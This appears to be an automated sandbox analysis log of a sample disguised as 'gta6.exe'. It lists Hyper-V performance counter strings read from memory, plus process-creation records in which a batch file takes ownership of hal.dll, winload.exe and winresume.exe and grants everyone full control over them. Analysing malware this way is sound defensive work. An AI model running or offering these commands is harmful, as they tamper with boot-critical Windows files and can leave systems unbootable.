Source: reg.exe, 00000020.00000003.1615168607.0000024D357B4000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1610991428.0000024D3578A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence 
Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flus
Source: icacls.exe, 0000001E.00000002.1315865422.0000024753962000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ss.svmci.syswfplwfs.sys`
Source: reg.exe, 00000020.00000003.1649996305.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000002.1650716716.0000024D35082000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1593084937.0000024D350E4000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1605869215.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1593392547.0000024D350E4000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1616668765.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1611402130.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1607676568.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1642047887.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1612803574.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1615368030.0000024D35081000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: THyper-V Hypervisor Root Virtual Processor
Source: reg.exe, 00000020.00000003.1649996305.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000002.1650716716.0000024D35082000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1605869215.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1616668765.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1611402130.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1607676568.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1642047887.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1612803574.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1615368030.0000024D35081000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: sWDHyper-V Hypervisor Root Partition
Source: reg.exe, 00000020.00000003.1616205398.0000024D357F4000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1611881262.0000024D357F4000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1612272320.0000024D357F4000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1615968093.0000024D357F4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervis
Source: reg.exe, 00000020.00000003.1593238842.0000024D350F7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec487
Source: reg.exe, 00000020.00000003.1593084937.0000024D350E4000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1593392547.0000024D350E4000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1612618239.0000024D350CD000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1616503260.0000024D350CD000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1641852190.0000024D350CF000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1594439512.0000024D350E1000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1597565960.0000024D350DF000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1607595828.0000024D350CD000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1598748911.0000024D350DB000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1599138962.0000024D350DB000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1599859371.0000024D350C9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: &Hyper-V Hypervisor
Source: reg.exe, 00000020.00000003.1583159282.0000024D35889000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: amd64_microsoft-windows-hyper-v-dmvsc_31bf3856ad364e35_none_40a51070cee1599d]^
Source: reg.exe, 00000020.00000003.1649996305.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000002.1650716716.0000024D35082000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1605869215.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1616668765.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1611402130.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1607676568.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1642047887.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1612803574.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1615368030.0000024D35081000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: JHyper-V Hypervisor Logical Processor;l-
Source: reg.exe, 00000020.00000003.1594895808.0000024D35106000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1594776251.0000024D350D2000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1594703951.0000024D3510D000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1594199326.0000024D350E1000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1594918365.0000024D3510B000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1594293310.0000024D350F3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: X2Hyper-V VM Vid Partitionui
Source: reg.exe, 00000020.00000003.1649996305.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000002.1650716716.0000024D35082000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1605869215.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1616668765.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1611402130.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1607676568.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1642047887.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1612803574.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1615368030.0000024D35081000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Dynamic Memory Integration Service)
Source: reg.exe, 00000020.00000003.1649996305.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000002.1650716716.0000024D35082000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1605869215.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1616668765.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1611402130.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1607676568.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1642047887.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1612803574.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1615368030.0000024D35081000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V jvtjinaerjcnmkc Bus"
Source: reg.exe, 00000020.00000003.1601148051.0000024D350D1000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1615644990.0000024D350CD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844
Source: reg.exe, 00000020.00000003.1615327515.0000024D357C0000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1611343119.0000024D357C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: redictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register Accesses Cost4996IO Instructions/sec4998IO Instructions Cost5000HLT Instructions/sec5002HLT Instructions Cost5004MWAIT Instructions/sec5006MWAIT Instructions Cost5008CPUID Instructions/sec5010CPUID Instructions Cost5012MSR Accesses/sec5014MSR Accesses Cost5016Other Intercepts/sec5018Other Intercepts Cost5020External Interrupts/sec5022External Interrupts Cost5024Pending Interrupts/sec5026Pending Interrupts Cost5028Emulated Instructions/sec5030Emulated Instructions Cost
Source: reg.exe, 00000020.00000003.1616146655.0000024D357B4000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1615490327.0000024D3578A000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1611988960.0000024D357B4000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1611486893.0000024D357B4000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1615758985.0000024D357B4000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1611751619.0000024D357B4000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1611684206.0000024D357B4000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1615691839.0000024D357B1000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1616057154.0000024D357B4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch P
Source: reg.exe, 00000020.00000003.1611402130.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1615368030.0000024D35081000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Count
Source: reg.exe, 00000020.00000003.1593084937.0000024D350E4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 4788Hyper-V Hypervisor4790Logical`
Source: reg.exe, 00000020.00000003.1649996305.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000002.1650716716.0000024D35082000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1605869215.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1616668765.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1611402130.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1607676568.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1642047887.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1612803574.0000024D35081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1615368030.0000024D35081000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V jvtjinaerjcnmkc Bus Pipes
Source: reg.exe, 00000020.00000003.1615208152.0000024D350CD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: er Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register Accesses Cost4996IO Instructions/sec4998IO Instructions Cost5000HLT Instructions/sec5002HLT Instructions Cost5004MWAIT Instructions/sec5006MWAIT Instructions Cost5008CPUID Instructions/sec5010CPUID Instructions Cost5012MSR Accesses/sec5014MSR Accesses Cost5016Other Intercepts/sec5018Other Intercepts Cost5020External Interrupts/sec5022External Interrupts Cost5024Pending Interrupts/sec5026Pending Interrupts Cost5028Emulated Instructions/sec5030Emulated Instructions Cost5032Debug Register Accesses/sec5034Debug Register Accesses Cost5036Page Fault Intercepts/sec5038Page Fault Intercepts Cost5040NMI Interrupts/sec5042NMI Interrupts Cost5044Guest Page Table Maps/sec5046Large Page TLB Fills/sec5048Small Page TLB Fills/sec5050Reflected Guest Page Faults/sec5052APIC MMIO Accesses/sec5054IO Intercept Messages/sec5056Memory Intercept Messages/sec5058APIC EOI Accesses/sec5060Other Messages/sec5062Page Table Allocations/sec5064Logical Processor Migrations/sec5066Address Space Evictions/sec5068Address Space Switches/sec5070Address Domain Flushes/sec5072Address Space Flushes/sec5074Global GVA Range Flushes/sec5076Local Flushed GVA Ranges/sec5078Page Table Evictions/sec5080Page Table Reclamations/sec5082Page Table Resets/sec5084Page Table Validations/sec5086APIC TPR Accesses/sec5088Page Table Write Intercepts/sec5090Synthetic Interrupts/sec5092Virtual Interrupts/sec5094APIC IPIs Sent/sec5096APIC Self IPIs Sent/sec5098GPA Space Hypercalls/sec5100Logical Processor Hypercall
Source: icacls.exe, 0000001E.00000003.1309867549.0000024753958000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vmci.sys`
Source: reg.exe, 00000020.00000003.1601112480.0000024D357B4000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1601008694.0000024D357B4000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1600728861.0000024D357B4000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1601291746.0000024D357B4000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1601421314.0000024D357B4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshotval.
Source: reg.exe, 00000020.00000003.1593084937.0000024D350E4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: pervisorStartupCost4906Hyper-V Hyp
Source: C:\Users\user\Desktop\gta6.exe Code function: 0_2_000000014000D9C4 GetTempPathW,LoadLibraryW,GetProcAddress,GetLongPathNameW,FreeLibrary, 0_2_000000014000D9C4
Source: C:\Users\user\Desktop\gta6.exe Code function: 0_2_000000014000C4D0 RtlRemoveVectoredExceptionHandler,RtlAddVectoredExceptionHandler, 0_2_000000014000C4D0
Source: C:\Users\user\Desktop\gta6.exe Code function: 0_2_000000014001F888 RtlAddVectoredExceptionHandler, 0_2_000000014001F888
Source: C:\Users\user\Desktop\gta6.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\278F.tmp\2790.tmp\2791.bat C:\Users\user\Desktop\gta6.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\fsutil.exe fsutil dirty query C:
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\hal.dll /r /d y
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\hal.dll /grant everyone:F /t
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\winload.exe /r /d y
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\winload.exe /grant everyone:F /t
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\winresume.exe /r /d y
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\winresume.exe /grant everyone:F /t
